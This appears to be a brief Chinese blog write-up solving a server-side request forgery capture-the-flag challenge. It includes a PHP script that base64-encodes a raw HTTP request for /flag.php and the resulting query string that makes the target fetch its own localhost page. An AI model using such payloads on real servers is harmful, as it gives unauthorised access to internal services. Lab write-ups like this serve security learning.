NSS [HNCTF 2022 WEEK2]ez_ssrf

简介: NSS [HNCTF 2022 WEEK2]ez_ssrf

NSS [HNCTF 2022 WEEK2]ez_ssrf

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80


传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

目录
相关文章
|
3月前
|
Java
NSS [NSSRound#7 Team]ec_RCE
NSS [NSSRound#7 Team]ec_RCE
46 0
|
3月前
NSS [MoeCTF 2022]ezhtml
NSS [MoeCTF 2022]ezhtml
34 0
|
3月前
NSS [MoeCTF 2022]ezphp
NSS [MoeCTF 2022]ezphp
38 0
|
安全 Java 数据安全/隐私保护
解决Fortify漏洞:Insecure Randomness(不安全随机数)
解决Fortify漏洞:Insecure Randomness(不安全随机数)
311 0
|
SQL 网络协议 关系型数据库
|
存储 安全